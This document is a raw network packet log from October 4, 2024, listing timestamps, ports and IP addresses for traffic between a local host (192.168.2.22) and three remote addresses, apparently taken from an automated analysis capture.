                                                                                                                                            Oct 4, 2024 11:56:12.633413076 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.633424044 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.634242058 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.634264946 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.634288073 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.634293079 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.634304047 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.634335995 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.635034084 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.635055065 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.635085106 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.635092974 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.635104895 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.635135889 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.635902882 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.635962963 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.635978937 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.636013031 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.636038065 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.706612110 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.706634045 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.706702948 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.706703901 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.706773996 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.706816912 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.718019962 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718039036 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718099117 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.718099117 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.718152046 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718281984 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.718750954 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718777895 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718810081 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.718830109 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.718854904 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.719614983 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.719638109 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.719679117 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.719696045 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.719721079 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.720297098 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720315933 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720359087 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.720376968 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720401049 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.720885038 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720911980 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720949888 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.720968008 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.720993042 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.721378088 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.721426964 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.721443892 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.721451998 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.721486092 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.721510887 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.784359932 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.803306103 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                            Oct 4, 2024 11:56:12.915960073 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:12.916006088 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.916069031 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:12.916467905 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:12.916481972 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.918351889 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:12.923207998 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:12.925964117 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:12.926043987 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:12.931041956 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.409951925 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.409998894 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410053015 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410101891 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410135031 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410166025 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410197973 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410201073 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.410201073 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.410231113 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410245895 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.410264969 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410296917 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.410346985 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.415208101 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.415261030 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.415293932 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.415318966 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.441976070 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.498109102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498156071 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498189926 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498219013 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.498224020 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498260021 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498269081 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.498291016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498706102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498748064 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.498755932 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498789072 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498821020 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.498858929 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.499492884 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.499545097 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.499578953 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.499591112 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.499612093 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.500353098 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.500400066 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.500402927 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.500437021 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.500500917 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.500545025 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.501132011 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.501180887 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.501214027 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.501260042 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.501276970 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.501924038 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.503179073 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.503211021 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.503233910 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.586446047 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586534977 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586589098 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586622000 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586652994 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586657047 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.586685896 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586698055 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.586720943 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586766958 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.586821079 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586853027 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586885929 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586921930 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.586930037 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.587052107 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587157965 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587192059 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587203979 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.587296009 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587327957 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587359905 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587374926 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.587429047 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587496996 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587527990 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587544918 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.587559938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587884903 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587934971 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.587935925 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.587970018 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588080883 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588112116 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588129044 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.588145971 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588177919 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588211060 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588223934 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.588273048 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588305950 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588336945 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.588350058 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.591584921 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591634989 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591667891 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591694117 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.591766119 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591798067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591829062 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591844082 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.591861963 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591893911 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591938019 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.591944933 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.591979027 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.592009068 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.592020988 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.607752085 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.612852097 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.612884998 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.612901926 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.612924099 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.612956047 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.612961054 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.612988949 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.613002062 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.613023996 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.613112926 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.613156080 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.617691994 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675220013 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675283909 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675322056 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675347090 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675348997 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675370932 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675415993 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675415993 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675479889 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675515890 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675539970 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675554991 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675564051 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675589085 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675600052 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675614119 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675654888 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675755024 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675870895 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675894022 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675918102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675932884 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.675945044 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.675993919 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676031113 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676099062 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676124096 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676146984 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676170111 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676183939 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676194906 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676369905 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676393032 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676413059 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676418066 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676516056 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676538944 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676557064 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676573992 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676597118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676620007 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676636934 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676642895 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676666975 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676688910 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676707029 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676712990 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676737070 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.676773071 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.676995993 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677021027 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677042961 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677078009 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677081108 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677103043 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677125931 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677141905 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677149057 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677172899 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677196026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677212954 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677220106 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677515030 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677537918 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677556038 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677562952 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677649021 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677671909 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677695036 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677695990 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677855968 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677879095 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677895069 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.677913904 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677938938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.677978039 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.680269003 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.680294037 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.680346966 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681010008 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681034088 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681057930 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681082010 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681135893 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681159019 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681194067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681202888 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681219101 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681277990 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681299925 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681318045 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681334972 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681359053 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681381941 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681397915 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681405067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681430101 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681442976 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681453943 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681644917 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681668997 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681684017 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.681691885 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681718111 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.681734085 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.688678026 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.693489075 CEST8049172192.3.220.20192.168.2.22
